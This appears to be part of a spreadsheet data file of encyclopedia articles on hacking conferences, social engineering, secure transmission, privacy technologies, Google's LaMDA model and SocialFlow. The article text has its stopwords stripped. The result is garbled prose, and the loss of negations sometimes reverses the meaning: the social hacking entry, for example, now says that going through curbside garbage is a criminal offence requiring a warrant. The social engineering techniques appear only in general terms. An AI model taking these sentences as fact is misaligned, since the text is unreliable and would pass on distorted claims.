hackerrank work, subscription service aims help companies source, screen, hire engineers technical roles. hackerrank work platform gives businesses option leverage built-in library programming challenges write tailor programming challenge directly company's open position. technical recruiters programming challenges test candidates specific programming skills better understand qualification certain role. candidate's challenges, submitted, auto-scored results provided technical recruiter review. companies amplify, quora, capital using hackerrank work technical recruiting screening processes. addition screening, hackerrank also hosts programming hackathons, referred codesprints, companies source technical candidates. companies hosted sponsored codesprints include addepar, yahoo!, quora, amazon. notable releases codepair, released february 2014, combines programming challenges real-time video interviewing. droidrank, released november 2014, adds support android-based programming challenges. sudorank, released february 2015, adds support linux-based scripting challenges dbrank, released july 2015, adds support database challenges db2, mysql, sql, oracle customers 2014, hackerrank work 1,000 paying customers subscription service. notable enterprise customers include adobe, amazon, atlassian, citrix, sports, evernote, quora, facebook, twitter, walmart, yahoo!, shaw zynga. also codechef hackerearth codefights codeforces codingame topcoder codewars references external links hackerrank</t>
  </si>
  <si>
    <t>Hackers on Planet Earth</t>
  </si>
  <si>
    <t>hackers planet earth (hope) conference series hacker convention sponsored security hacker magazine 2600: hacker quarterly 2020 typically held hotel pennsylvania, manhattan, york city. occurring biennially summer, fourteen conferences date. hope 2020, originally planned held john's university, instead held nine-day virtual event july august 2020. fourteenth hope, hope," held john's university queens july 2022. hope features talks, workshops, demonstrations, tours, movie screenings. hope significantly inspired quadrennial hack-tic events netherlands also inspired annual chaos communication congress (c3) held germany. summercon also influential predecessor. structure hope held hotel pennsylvania york city every time except since 1994. event always structured similar way. consists three days three nights activities, including talks, workshops, performances. also features hackerspace villages, film festival, lock picking villages, wide variety vendors, installations, live video, vintage computers, robots, amateur/ham radio station, electronics workshops, book signings.the closing ceremony regular part event, celebrating event, organizers, volunteers, also features performances. since 2006, monochrom's johannes grenzfurthner regular performer closing ceremony. conferences hope: hackers planet earth held august 13–14, 1994 hotel pennsylvania, first hope conference marked 2600: hacker quarterly's 10th anniversary. over 1,000 people attended, including speakers around world. access 28.8 kbit/s local network provided. this conference visited covered second episode "your radio playhouse" show, later renamed this american life. beyond hope august 8–10, 1997 beyond hope conference held puck building, manhattan, york city. attendance doubled, 2,000 attendees. bell technology group helped support hackers. hacker group l0pht heavy industries presented panel discussion covered recent projects, accomplishments, emerging trends shortcomings technologies, deep dive windows password internals. reunion recorded live broadcast hook took place. mbit/s local network provided attendees. july 14–15, 2000 hope returned hotel pennsylvania, subsequent conferences held. conference hours day, bringing 2,300 attendees. jello biafra gave keynote speech. cultural exchange punk rock icon/free speech activist hacker community, jello drew connections communities, despite lack computer experience. also raised thousands dollars. conference provided working ethernet link internet. h2k2 h2k2, july 12–14, 2002, theme focused u.s. homeland security advisory system. h2k2 included tracks scheduled speakers, third track reserved last-minute self-scheduled speakers, movie room, retrocomputing, musical performances, state world address jello biafra, keynotes aaron mcgruder siva vaidhyanathan discussions dmca decss. freedom downtime premiered friday evening (july 14). conference provided wireless 802.11b coverage wired ethernet, open computer area access 24-hour link internet "t-1ish" speeds, made available datahaven project internal network. fifth hope fifth hope, july 9–11, 2004, theme propaganda, commemorated anniversaries h.o.p.e. conferences hook (with live broadcast show conference, beyond h.o.p.e.). keynotes speakers kevin mitnick, steve wozniak, jello biafra. there also presentation "members" phone losers america celebrated tenth anniversary. cult dead hacker collective celebrated twentieth anniversary conference. conference provided access four-layer public network lines, plus backup links internet public terminal cluster, various wired connections, wifi network three floors video network. hope number hope number six, july 21–23, 2006, included talks richard stallman jello biafra. kevin mitnick scheduled conference unable appear: vacation colombia illness prevented timely return u.s. hope number 100-megabit internet connection; conference organizers claimed fastest internet connection to-date u.s. hacker conference. event's theme based number prisoner designation shared titular "prisoner,"). notable occurrences: steve rambam, private investigator heading pallorium, inc., online investigative service, scheduled lead panel discussion titled "privacy dead... over it." minutes start panel, rambam arrested charges unlawfully interfered ongoing case federal prosecutors filed albert santoro, former brooklyn assistant york district attorney indicted january 2003 count money-laundering. charges eventually dropped talk subsequently held november 2006, long conference. jello biafra began talk referring arrest steve rambam, noting convention "spook heavy" usual. announced "special message" "any federal agents audience", mooned convention. last hope "last hope" took place july 18–20, 2008 hotel pennsylvania. change past years internet forum facilitate community participation planning event. conference name referred expectation would final h.o.p.e. conference scheduled demolition venue, hotel pennsylvania. save hotel pennsylvania foundation created work toward keeping building demolished then-new owner, vornado realty trust. "next hope" scheduled summer 2010. closing ceremony revealed word "last" could also refer previous event, ended (referring last hope itself). steven levy gave keynote address. kevin mitnick, steve rambam, jello biafra, adam savage mythbusters featured speakers. descriptions audio talks found thelasthope.org next hope hope convention, "the next hope", took place july 16–18, 2010. next hope held hotel pennsylvania, plans vornado demolish hotel hold. hope number nine hope number nine occurred july 13–15, 2012 hotel pennsylvania manhattan.keynote presentations hope number nine given (with andy bichelbaum principal speaker vermin supreme also participating) whistleblower william binney. chris kubecka, principal speaker presentation internet censorship served cease desist letter attempt censor presentation unisys threatened termination presentation titled "the internet porn! high heels fishnet have driven internet innovation information security". unisys demanded information regarding presentation removed internet, streisand effect occurred, censorship attempt posted thousands websites instead. first conference, ghost speaker @jk47theweapon deliver presentation legal threats kubecka. prior beginning, invited "any hangers associates firm baker mckenzie" speak electronic frontier foundation (eff). baker mckenzie firm unisys netherlands threatened terminate employee letter giving presentation internet censorship. hope hope took place july 18–20, 2014 hotel pennsylvania. keynote speakers daniel ellsberg edward snowden; also featured noted former official whistleblower thomas drake. theme conference "dissent", whistle-blowing topic good number talks. conference also featured critical talks state hackdom, example johannes grenzfurthner monochrom spoke problems rockstar martyrdom within hacker scene creation hacker cult figures (like snowden, appelbaum assange) unreflective members community media.notable changes included massive increase available bandwidth. previous conferences mbit connection; hope gbit fibre optic connection provided hurricane electric. this geometric increase bandwidth made possible live streaming conference talks real time. ellsberg/snowden keynote seen countries. this also first year conference areas fully connected conference network, albeit workshop floor slightly limited connectivity gbit connection, compared gbit backbone conference spaces). five different wireless networks provided conference attendees. hammocks mezzanine level, provided place attendees sleep unable procure place otherwise replaced inflatable furniture dedicated "chill space" area. mezzanine space also explicitly dedicated attendee meetups form villages, similar assemblies chaos communication congresses villages hacker camps, specifically "village zone (primarily soldering electronics workshop), "village zone "lockpickers village", "noisy square". workshop tracks published schedule conference took nearly hotel's available meeting space. hope hope (the eleventh hope) took place july 22–24, 2016 hotel pennsylvania. cory doctorow keynote speaker. like last time, hope provided internet transit hurricane electric eighth avenue fiber connection leased corporation. aruba networks sponsored wireless access points used provide wireless networks attendees, secured either psk, another network noc, press speakers.network connectivity fully provided areas, came throughout conference many talks filled capacity attendees either watched streams devices designated overflow viewing areas. circle hope (hope 12th hope conference, "the circle hope", occurred july 20–22, 2018. speakers included chelsea manning, barrett brown, richard stallman, jason scott, matt blaze, micah lee, steve rambam, among many others. conference marked protests alt-right activists. hope 2020 conference originally planned july 31-august 2020 venue, john's university queens. covid-19 pandemic changed nine-day virtual event july august 2020. addition longer schedule talks, originally planned events streamed, including workshops musical performances. keynote speakers libby open technology fund (otf), flavio aggio world health organization (who), idalin bobé techactivist.org, tiffany anatrope inc, yeshimabeit milner data black lives, jaron lanier, cindy cohn, cory doctorow, richard thieme. conference participants communicated primarily using first year appearance hope's matrix chat server. 2021 canceled plan in-person hope conference planned summer 2021, breaking typical biennial conference interval, canceled ongoing covid-19 pandemic. hope 14th conference, hope, scheduled occur john's university queens, york city 22-24 july 2022. also chaos communication camp toorcon references external links hope website</t>
  </si>
  <si>
    <t>Hacker culture</t>
  </si>
  <si>
    <t>HackMiami</t>
  </si>
  <si>
    <t>hackmiami formal organization information security professionals host annual international hacker conference takes place miami beach, known 'hackmiami conference.'the organization involved research primarily fields malware analysis, botnets, application security research, cybercrime research, network security research. organization also organizes bi-weekly local events themed around ethical hacking topics throughout south florida, offer information security consultation services individuals businesses. history hackmiami gatherings informally began 2008 organization officially incorporated 2009. original concept retired goal opening physical hackerspace located miami, florida. hackmiami began group computer science engineering students biweekly meetings held florida international university. group initially focused hardware research development, well renewable energy projects. group eventually stopped meeting university order maintain quality control research. early 2009, group began focus application security malware analysis. 2011, organization pivoted different business model security consultation services niche event planning lieu managing membership based hackerspace. annual conference hackmiami holds annual conference called hackmiami conference south florida. first 2013 hackmiami conference took place 17–19, 2013 miami beach, florida. event subject rolling stone article "the geeks front lines." written journalist david kushner, discussed topic government recruitment hackers digital warfare.the winter hacker festival presented hackmiami took place december 2013 miami beach, event featured edition k&amp;&amp;k hacking tournament featured performances ytcracker, wyte, project pat, dual core, percent 2014 hackmiami conference took place 9–11, 2014 miami beach, featured presentations threat labs, team cymru, dave marcus intel security, hackmiami board alexander heid, james ball, soto christopher snyder. 2015 hackmiami conference took place 15–17, 2015 miami beach, featured presentations dave monnier team cymru john mcafee hackmiami board alexander heid, james ball, soto christopher snyder. during 2015 hackmiami conference, ethical hacker seth wahle demonstrated android malware deployment method whereby able infect mobile devices near field communication microchip implant injected hand.the 2016 hackmiami conference took place 13–15, 2016 historic hotel deauville miami beach, featured presentations iftach amit john mcafee hackmiami board alexander heid, james ball, soto christopher snyder. 2017 hackmiami conference took place 19–21, 2017 hotel deauville miami beach, featured keynote presentations michael gough neil "grifter" wyler, hackmiami board alexander heid, james ball, soto christopher snyder. july 2017, hotel deauville damaged electrical fire since condemned demolition. closure hotel forced hackmiami conference seek another venue subsequent years. 2018 hackmiami conference took place 18–20, 2018 seacoast suites miami beach miami beach, featured keynote presentations christopher ahlberg recorded future, jack daniel security bsides, hackmiami board alexander heid, james ball, soto. 2019 hackmiami conference took place 17–19, 2019 seacoast suites miami beach miami beach, featured keynote presentations dave marcus, vinny troia, hackmiami board alexander heid, james ball, soto. covid pandemic macroeconomic issues 2020-2022, annual conference held bi-weekly local meetups migrated hybrid format online on-site. year 2021, defcon conference vegas, jonathan respeto chad seaman, representing hackmiami, defcon black badge placing first defcon capture packet competition. 2023 hackmiami conference scheduled take place 19-20, 2023 sunny isles beach, public gatherings hackmiami holds public biweekly meetings matters information security progress ongoing projects openly discussed. members encouraged present information research group active participation collaboration attendees. attendees local meetings conference maintain communication throughout year private slack discord servers. founders current founders make board directors hackmiami organization:alexander heid co-founder james ball co-founder soto co-founder references</t>
  </si>
  <si>
    <t>HackMIT</t>
  </si>
  <si>
    <t>hackmit annual student-run hackathon held fall massachusetts institute technology. history hackmit first hackmit around attendees took place february 2013 stata center part mit's techfair, technology fair corporate expo students. event open college students northeastern united states techfair palantir title sponsors. hackmit 2013 hackmit also held september 2013 1000 attendees. event featured lehman genius (formerly genius) keynote speaker sequoia capital event's title sponsor. hackmit 2014 october, hackmit 2014 invited 1000 undergraduates well adora cheung, then-ceo homejoy, alexis ohanian, co-founder reddit, keynotes. highlighted sponsors hackmit 2014 amadeus, google, uber. hackmit 2015 hackmit 2015's theme experimentation, teams built projects ranging apple watch guitar computer vision analysis tools security camera footage. keynote speakers year included fosslien, author webcomic office, jack conte, musician co-founder patreon. hackmit 2016 2016 event focused inclusivity featured random lottery admissions process combined selected application reading. keynote speakers included sanjit biswas, co-founder samsara meraki, inc., dina katabi, professor director center wireless networks mobile computing. hackmit 2017 hackmit held september 2017, 1200 hackers came together around world. keynote speakers included steve huffman, co-founder reddit kyle vogt, founder cruise automation. projects over years, hackmit seen wide variety hacks, ranging mobile concepts novel hardware/software interfaces machine learning computer vision projects. particular, hackmit emphasizes building working prototypes rather business plans ideas, participants encouraged open technical challenges faced judging process. some notable projects past hackmit events include: lean mental health platform matches users peer supporters controlio, allows users control computer voice control project naptha, browser extension software google chrome allows users highlight, copy, edit translate text within images. blueprint hackmit organizing team also hosts high school hackathon, called blueprint, mit's campus winter. past years, event featured separate learning hacking days, students volunteering teach classes introductory mobile development. open source hackmit developed open-source software hackathon community, releasing internal external tools code.hackmit.org. hackmit software like helpq gavel used dozens events. puzzles since 2014, hackmit released annual admissions puzzle, similar online puzzlehunt guarantees admission first teams. references</t>
  </si>
  <si>
    <t>Social hacking</t>
  </si>
  <si>
    <t>social hacking describes attempting manipulate outcomes social behaviour orchestrated actions. general function social hacking gain access restricted information physical space without proper permission. most often, social hacking attacks achieved impersonating individual group directly indirectly known victims representing individual group position authority. this done pre-meditated research planning gain victims’ confidence. social hackers take great measures present overtones familiarity trustworthiness elicit confidential personal information. social hacking commonly associated component “social engineering”. although practice involves exercising control human behaviour rather computers, term "social hacking" also used reference online behaviour increasingly, social media activity. technique used multiple ways affect public perception conversely, increase public awareness social hacking activity. however, awareness helps reduce volume hacks carried out, technology allowed attack tools become sophisticated. social hacking techniques carrying social hacking attack involves looking weaknesses user behaviour exploited seemingly legitimate means. three popular methods attack include dumpster diving, role playing, spear-phishing. dumpster diving sifting garbage popular tactic social hackers recover information habits, activities, interactions organizations individuals. information retrieved discarded property allows social hackers create effective profiles targets. personal contact information employee titles phone numbers appropriated discarded phone books directories used gain technical information login data security passwords. another advantageous find social hackers discarded hardware, especially hard drives properly scrubbed clean still contain private accurate information corporations individuals. since surfing people's curbside garbage criminal offence require warrant, rich resource social hackers, well legally accessible one. dumpster diving yield fruitful, albeit smelly, results information seekers private investigators, stalkers, nosy neighbours, police. roleplaying establishing trust fooling people believing legitimacy false character main tenets social hacking. adopting false personality impersonating known figure trick victims sharing personal details done person phone conversation. person posing third party maintenance workers office building, medical practitioners hospital, many forms, social hackers past security personnel employees undetected. examples, uniform apparel associated specific functions, giving people reason trust impersonators. complicated manoeuver would involve longer planning cycle, taking employment inside organization targeted attack. movie ocean's eleven, sophisticated crew artists plot elaborate heist three popular vegas casinos assimilating everyday activities casinos' operations. although heist executed less day, planning cycle long notably fastidious. imperative function attack present credibility roles impersonated, attention detail inevitably required. tailgating tailgating following someone restricted space, office building academic institution. third party maintenance workers, medical personnel, mentioned above, often limited cause justify credibility appearances. similar role playing, tailgating functions around assumption familiarity trust. people less likely react suspiciously anyone appears surrounding environment, even less liable question individuals call attention themselves. following behind someone unassuming fashion even eliminate need establish rapport authorized personnel. spear phishing online social hacks include “spear phishing” hackers scam victims releasing sensitive information organization. hackers target individuals within specific organizations sending emails appear come trusted sources including senior officials within organization hold positions authority. appear convincing, social hacker's email message establish tone familiarity forestalls suspicion part recipient. email designed forth request information ties logically person sending often, company employees fall prey emails share personal information phone numbers passwords, thinking information transfer taking place secure environment. sinister scenarios, emails hackers embedded malware infects victims’ computers without knowledge secretly transfers private data directly hackers. from october 2013 december 2016, investigated 22,000 incidents involving american businesses. total, losses approaching $1.6 billion.a successful example spear phishing highly publicized news media january 2014, target, u.s.-based retailer, experienced security breach allowed hackers steal customers’ credit card personal data information. later, revealed cyber criminals able access target's financial personal data files targeting third party mechanical company access target's network credentials. social implications high-profile social hack affect target's popularity retailer, also consumers’ trust loyalty towards brand. another example spear phishing happened june 2015 ubiquiti networks inc, network technology company based united states. during spear phishing ubiquiti networks reportedly lost 46.7 million dollars. hacking group sent spear phishing emails employees finance department. these hackers sent spear phishing emails directly finance department's employees posing company executives. hackers managed trick employees transferring funds third party groups seas. fortunately ubiquiti networks, million dollars recovered hackers. security although target slacking security, hackers able infiltrate target's network indirectly, identifying third party company access target's credentials. social hack defrauding employees third party divulge sensitive information, cybercrime conducted means malware infected email phishing attack. need vigilant online security highlighted cyber-attacks corporations like target well global businesses high-traffic websites. even small websites vulnerable attacks, specifically security protection presumed low. target's case, third party mechanical company inadequate security software left open malware attack.in similar incident, yahoo mail also announced january 2014 system hacked number user email accounts accessed. while origin cause unclear, poor security centre trouble. cases, large corporations assumed understanding security policies compromised. also cases, consumer data stolen.in study orgill al., observation made important person responsible computer security system vulnerable attacks social engineers, effect social engineering attack mitigated.” using strong passwords simple easy method assists mitigation, using reliable effective anti-virus software. other preventative measures include using different logins services used, frequently monitoring accounts personal data, well alert difference request help phishing attempt strangers. ethical hacking counter security breaches hands social hackers well technical hackers, companies employ security professionals, known ethical hackers, popularly, white hackers, attempt break systems manner social hackers would employ. ethical hackers leverage tools methods hackers criminal intent legitimate objectives. ethical hackers evaluate security strengths weaknesses provide corrective options. ethical hacking also known penetration testing, intrusion testing teaming. impacting social media internet affords social hackers ability populate content spaces without detection suspicious behaviour. social hacking also occur environments user-generated content prevalent. this includes opportunity influence opinion polls even skew data beyond point validity. social hacking also used provide favourable reviews e.g. product websites. also used counter negative feedback influx positive responses ("like button") e.g. blog news article comment sections. social hacking cause damage online profile person brand simple accessing information openly available social media channels. technology appropriation technology appropriation perceived type social hacking involves social manipulation technology. describes effort users make sense technology within contexts beyond adopting intended use. when happens, technology change. adaptation technology incorporate reinterpretation function meaning, effect technology take role. appropriation accentuates user adjusts technology best practice, adaptation advises sometimes changes general. example, advances today's technology make easier ever portray another person. this method known creating "deepfake". deep fake someone recreate somebody else's face voice computer program. used fake people saying things never done said before. "public figures “fakeable” method private ones. visually routine situations, like press conference, likely faked entirely novel ones." deepfakes dangerous sense used fake people high authority said president politicians. there many articles discussions discovery deepfakes youtuber shane dawson's video, "conspiracy theories shane dawson" talks conspiracy deepfakes could mean world today.social hacking also affiliated social enterprise. social enterprise represented form for-profit non-profit organizations encourage socially responsible business strategies long-term environmental human well-being. concept socially hacking enterprises within existing capitalist structure human endeavour encourages people re-evaluate social systems accustomed order identify problems addressed. enterprises created replace systems reinforce sustainability regenerative growth. also certified social engineering prevention specialist (cseps) cyberheist internet security awareness training risk penetration test perception management phishing piggybacking (security) smishing vishing deepfake references doxing morrison, january 2014). "the system failing, hack system". theguardian.com. retrieved january 2014. "types social engineering". national plant diagnostic network. beck, rochelle. "hack capitalism".</t>
  </si>
  <si>
    <t>Secure transmission</t>
  </si>
  <si>
    <t>computer science, secure transmission refers transfer data confidential proprietary information secure channel. many secure transmission methods require type encryption. common email encryption called pki. order open encrypted file, exchange done. many infrastructures banks rely secure transmission protocols prevent catastrophic breach security. secure transmissions place prevent attacks spoofing general data loss. software hardware implementations attempt detect prevent unauthorized transmission information computer systems organization outside referred information leak detection prevention (ildp), information leak prevention (ilp), content monitoring filtering (cmf) extrusion prevention systems used connection methods ensure secure transmission data. secure transmission wireless infrastructure deprecated algorithm secure ieee 802.11 wireless networks. wireless networks broadcast messages using radio, susceptible eavesdropping wired networks. when introduced 1999, intended provide confidentiality comparable traditional wired network. later system, called wi-fi protected access (wpa) since developed provide stronger security. web-based secure transmission transport layer security (tls) predecessor, secure sockets layer (ssl), cryptographic protocols provide secure communications internet things browsing, e-mail, internet faxing, instant messaging data transfers. there slight differences tls, substantially same. references</t>
  </si>
  <si>
    <t>Labeled Security Protection Profile</t>
  </si>
  <si>
    <t>labeled security protection profile (lspp) protection profile within common criteria information technology security evaluation, security functional assurance requirements products. lspp requirements derived class department defense security standard called trusted computer system evaluation criteria (tcsec) originally published 1985. example, z/os v1.7 certified eal4+ lspp 2006. also common criteria external links labeled security protection profile</t>
  </si>
  <si>
    <t>Soft privacy technologies</t>
  </si>
  <si>
    <t>soft privacy technology falls category pet, privacy-enhancing technology, methods protecting data. another sub-category, called hard privacy. soft privacy technology goal keep information safe process data full control data used. soft privacy technology emphasis usage third-party programs protect privacy, emphasizing audit, certification, consent, access control, encryption, differential privacy. with advent technology, need process billions data every many areas health care, autonomous cars, smart cards, social media data, more. applications health care usages medical devices like ambient assisted living, monitors reports sensitive information remotely cloud. cloud computing offers solution meets healthcare need processing storage affordable price. they used monitor patient's biometric conditions remotely connect smart technology. addition monitoring, devices also send mobile notification certain conditions pass point major change blood pressure. nature device reporting constant data usage smart technology, subject privacy concerns. this soft privacy comes question effectiveness third-party cloud service present several privacy concerns including risk unauthorized access, data leakage, sensitive information disclosure, privacy disclosure.one solution proposed issue cloud computing health care usage access control giving partial access data based user's role doctor, family, etc... another solution explored wireless technology moving data cloud usage differential privacy. differential privacy system typically encrypts data, sends trusted service, opens hospital institutions. strategy often used prevent data leakage attacks adding ‘noise’ data changes value slightly accessing real information security questions. study sensors concluded differential privacy techniques involving additional noise helped achieve mathematically-precise guaranteed privacy.in mid-90s commonwealth massachusetts group insurance commission released anonymous health records hiding sensitive information address phone number. despite attempt hiding information providing sort database, privacy still breached people found correlation health databases public voting databases. without encrypting data noise differential privacy adds, possible link data seem related, together. autonomous cars autonomous cars raise concerns location tracking device sensor-based vehicles. achieve full autonomy would need massive database information surrounding, paths take, interaction others, weather, many circumstances needs accounted for. this leads question data stored, shared with, type data stored. data potentially sensitive could used maliciously leaked hacked. there concerns selling data companies data help predict products consumer would like need. expose health conditions alert companies advertise said customers location-based spam/products. terms legal aspect technology, rules regulations garnering parts car, still open oftentimes outdated. many current laws vague, leaving rules open interpretation. example, federal laws dating back many years restricting computer privacy, laws simply extended rule phones, extending rules “computer” inside driverless cars. addition this, concerns government access driver-less data, giving opportunity mass surveillance tracking warrants. from perspective companies, using data improve technology home marketing data needs consumer. response consumer's concern understanding slow-paced government action, automakers created automotive information sharing analysis center (auto-isac) august 2015 establish protocols cybersecurity handle vehicular communication systems safe manner autonomous cars. vehicle-to-grid known plays role energy consumption, cost, effectiveness smart grids. this system electric vehicles charge discharge communicates power grid fill appropriate amount. this extremely important electric vehicles opens privacy issues relating location. example, user's home address, place work, place entertainment, record frequency, reflected charging history. with information could potentially leaked, wide variety security breach occurs. example, someone’s health could deduced number hospital visits, user receive location-based spams, malicious intent usage home address work schedule. similarly health data, possible solution differential privacy noise mathematical data leaked information accurate. cloud storage using cloud important consumers business provides cheap source virtually unlimited storage space. challenge cloud storage faced search function. typical cloud computing design encrypts word enters cloud. this brings issue user’s ability search keywords hindering results searching specific file. this ends double-edged sword protecting privacy introducing inconvenient problems. solution lies search, documents indexed entirely rather keywords. also handles process change letters matching letter respective pair. case, privacy achieved easy search words match encrypted files now. however, issue arises this, takes longer time read match encrypted file decrypt whole thing user. mobile data vpns used create remote user home network encrypt package usage. this allows user private network internet. this encrypted tunnel trusts third party protect privacy user acts virtual leased line shared public infrastructure. difficult time comes mobile applications network constantly changing breaks, thus endangering privacy gives encryption. polices authority also could soft privacy technology criminals accessing cloud data. there many instances privacy surveillance concern reached supreme court. some instances used data track suspects' locations aggregated monitored data long periods time. however, prevented supreme court case riley california unanimously voted prevent warrantless searches mobile data. effort reduce call many people taken advantage apps promise reduce attacks. tethers line privacy consent many apps known collect phone data including callers, phone honeypot call detail records (cdrs), call recordings. important thing consider equations deciding type differential privacy budgets. typically small-scaled apps varying budget degrees. there differential privacy protocols proven effective many fields. this resulted higher cost companies would paying without differential privacy. this dataset needed construct good algorithm achieves local differential privacy much larger. danger using vpns they susceptible attackers fabricate, intercept, modify, interrupt traffic. they become target sensitive information often transmitted networks. quick vpns generally provides faster tunnel establishment less overhead downgrades effectiveness vpns security protocol. also found changing long usernames addresses) passwords frequently also important achieving security protection malicious attacks. smart cards newer smart cards developing technology used authorize users certain resources. using biometrics fingerprints, iris images, voice patterns, even sequences access control sensitive information passport help ensure privacy. biometric important access code one’s information virtually anything particular person. currently used telecommunications, e-commerce, banking applications, government applications, healthcare, transportation, more. most vpns protect computer viruses malware. danger using biometrics leaked biometric contains unique characteristic details person said event, would fairly easy trace endangered user. this poses great danger said information leaked biometric contains unique characteristic details person said event, would fairly easy trace endangered user. there possible solutions this: anonymous biometric access control system (abac): authenticate valid users system without knowing example, hotel able admit guest member room without knowing details person even though verification process still utilizing biometrics. developed center visualization virtual environment, system composed hamming distance computation, extraction, comparison, result aggregation, implemented homomorphic cipher. essentially, allows biometric server confirm user without knowing identity. this done taking biometric saved encrypting while saving biometrics, specific processes de-identify features facial recognition encrypting data even leaked, would danger tracing someone's identity. online videos online learning using mobile videos become prevalent time. biggest challenges privacy field idea prefetching videos. with sudden increase higher traffic video presence, many turned prefer offload demands delay reduction. prefetching program loads resources needed decrease eventual wait time. seems perfect solution needed time increasing demand videos, prefetching heavily relies prediction. accurate prediction happen, necessary access view history know user give accurate prefetching, otherwise, waste bandwidth benefit. after learning user’s view history popular content user likes, easier predict next video prefetch, valuable possibly sensitive data.proposed privacy solution: dpdl-svp -differential privacy-oriented distributed online learning mobile social video prefetching, separates main problems subproblems enables mobile users solve subproblems focusing communicating mobile neighbors social members. this gives differential privacy preserves sensitive viewing information. third party certification there increased growth online transactions, initiative purpose reducing consumer’s perception risk. firms found ways gain trust consumers seals certifications third party platforms. study done electronic commerce research found payment providers reduce perceptions risk consumers presence third-party logos seals checkout page enhance visitor conversion. these logos certificates serve indicator consumer feel safe inputting payment information shipping address. future soft privacy technology mobile concern possible solutions mips mobile intrusion prevention system looks location-aware help protect users utilizing future technology virtualized environments phone acts small virtual machine. some cases wary future includes stalking attacks, bandwidth stealing, attack cloud hosts, pa2: traffic analysis attack device based confined area. current privacy protection programs prone leakage account changing bluetooth, locations, connections affect often leakage occur. public key-based access control context sensor net, public-key based access control (pkc) good solution future cover issues wireless access control. sensor net, danger attackers includes; impersonation grants access malicious users, replay attack adversary captures sensitive information replaying interleaving selectively combines messages previous sessions, reflection adversary sends identical message originator similar impersonation, forced delay blocks communication message sent later time, chosen-text attack attacker tries extract keys access sensor. solution public key-based cryptography study done haodong wang shows pkc-based protocol presented better traditional symmetric regards memory usage, message complexity, security resilience. social media privacy management part social networks paper presents several solutions issue. example, users various social networks ability control specify information want share certain people based trust levels. privacy concerns arise this, example 2007 facebook received complaints advertisements. instance facebook’s partner collects information user spreads user’s friends without consent. there proposed solutions prototype stage using protocol focuses cryptographic digital signature techniques ensure right privacy protections place. massive dataset with increasing data collection source become prone privacy violations target malicious attacks abundance personal information hold. some solutions proposed would anonymize data building virtual database anonymizes data provider subjects data. proposed solution developing technology called l-site diversity. references</t>
  </si>
  <si>
    <t>LaMDA</t>
  </si>
  <si>
    <t>lamda, stands language model dialogue applications, family conversational neural language models developed google. first generation announced 2021 google keynote, second generation announced following year's event. june 2022, lamda gained widespread attention google engineer blake lemoine made claims chatbot become sentient. scientific community largely rejected lemoine's claims, though conversations efficacy turing test, measures whether computer pass human. history announcements google announced lamda conversational neural language model google keynote 2021, powered artificial intelligence. built transformer neural network architecture developed google research 2017, lamda trained human dialogue stories, allowing engage open-ended conversations. google states responses generated lamda ensured "sensible, interesting, specific context".on 2022, google unveiled lamda serves successor lamda, 2022 google keynote. incarnation model draws examples text numerous sources, using formulate unique "natural conversations" topics trained respond additionally, google launched test kitchen, mobile application powered lamda capable providing lists suggestions on-demand based complex goal. originally open google employees, made available "select academics, researchers, policymakers" invitation sometime year. sentience claims june 2022, washington post reported google engineer blake lemoine placed paid administrative leave lemoine told company executives blaise agüera arcas gennai lamda become sentient. lemoine came conclusion chatbot made questionable responses questions regarding self-identity, moral values, religion, isaac asimov's three laws robotics. google refuted claims, insisting substantial evidence indicate lamda sentient. interview wired, lemoine reiterated claims lamda person" dictated thirteenth amendment, comparing "alien intelligence terrestrial origin". revealed dismissed google hired attorney lamda's behalf, chatbot requested lemoine july google fired lemoine, asserting blake violated policies safeguard product information" rejected claims "wholly unfounded".lemoine's claims widely rejected scientific community. gary marcus, psychology professor formerly york university, denounced "nonsense stilts" emphasized lamda feelings self-awareness. david pfau google sister company deepmind erik brynjolfsson institute human-centered artificial intelligence stanford university ridiculed idea language model could sentient. yann lecun, leads meta platforms' research team, stated neural networks lamda "not powerful enough attain true intelligence". university california, santa cruz professor kreminski noted lamda's architecture "support capabilities human-like consciousness" neural network weights "frozen", assuming typical large language model, university surrey professor adrian hilton declared assertion lamda sentient "bold claim" backed facts. watson lead developer david ferrucci compared lamda appeared human watson first introduced. former google ethicist timnit gebru called lemoine victim "hype cycle" initiated researchers media. lemoine's claims also generated discussion whether turing test remained useful determine researchers' progress toward achieving artificial general intelligence, will omerus post opining test actually measured whether machine intelligence systems capable deceiving humans. method lamda uses decoder-only transformer language model. pre-trained text corpus includes documents dialogs consisting 1.56 trillion words, trained fine-tuning data generated manually annotated responses sensibleness, interestingness, safety. tests google indicated lamda surpassed human responses area interestingness. lamda transformer model external information retrieval system interact improve accuracy facts provided user.three different models tested, largest billion non-embedding parameters: also google chinese room argument natural language processing philosophy artificial intelligence references general citations external links press release</t>
  </si>
  <si>
    <t>SocialFlow</t>
  </si>
  <si>
    <t>socialflow social media optimization platform leading brands publishers. company uses twitter firehose, click data derived proprietary link proxy, along proprietary algorithms, optimize delivery messages social networks. company believes understanding utilizing metrics engagement, clicks tweet clicks follower, central growing large active social media following. their analysis data visualization news filtered around death osama laden twitter received international news coverage questions role twitter journalism.socialflow associated betaworks, york-based startup studio, incubator, venture capital company promotes real-time information flow internet. currently headquartered york city. february 2022, announced socialflow acquired digital experience platform piano software inc. history early history socialflow founded early 2009 frank speiser mike perrone, sought apply scientific approach task building sustaining engaged social media audiences scale.in 2013, socialflow targeted syrian electronic army, hacking cyber-criminal group organized 2011 support syrian president bashar al-assad syrian civil war. group gained access socialflow’s social media accounts sending phishing email company’s employees. attack resulted brief takedown socialflow’s website publishing platform lasted minutes. promote internet security account protection, socialflow published detailed account hack security response blog post. investors socialflow announced april 2011 raised million series funding. series round softbank, softbank ventures, betaworks, highline venture partners, venture partners, angel group high profile angel investors participating. april 2013, socialflow announced raised million round series funding. fairhaven capital round joined existing investors softbank capital, ventures, ventures betaworks, well investors kbs+ ventures rand capital corporation. acquisition february 2022, announced socialflow acquired digital experience platform piano software inc. undisclosed amount. transaction cash purchase, funding provided updata partners, rittenhouse ventures sixth street partners, results piano acquiring 100% shares socialflow. corporate affairs company announced june 2011 peter hershberg joined company president. research socialflow gained considerable media attention published "breaking laden: visualizing power single tweet". study demonstrated twitter evolved primary news source, death osama laden broke twitter.their next study "engaging news-hungry audiences tweet tweet" looked twitter audiences al-jazeera english, news, cnn, economist, news york times revealed similarities differences respective organization's audience, simultaneously demonstrating true value audience engagement.another notable study created socialflow looked launch kony 2012 video social media. noted forbes writer anthony kosner, study socialflow research group showed that, rather emerging liberal enclaves american coasts, initial wave social media traffic launched kony 2012 video originated mid-sized, relatively conservative cities middle america. references external links official website</t>
  </si>
  <si>
    <t>HTTP cookie</t>
  </si>
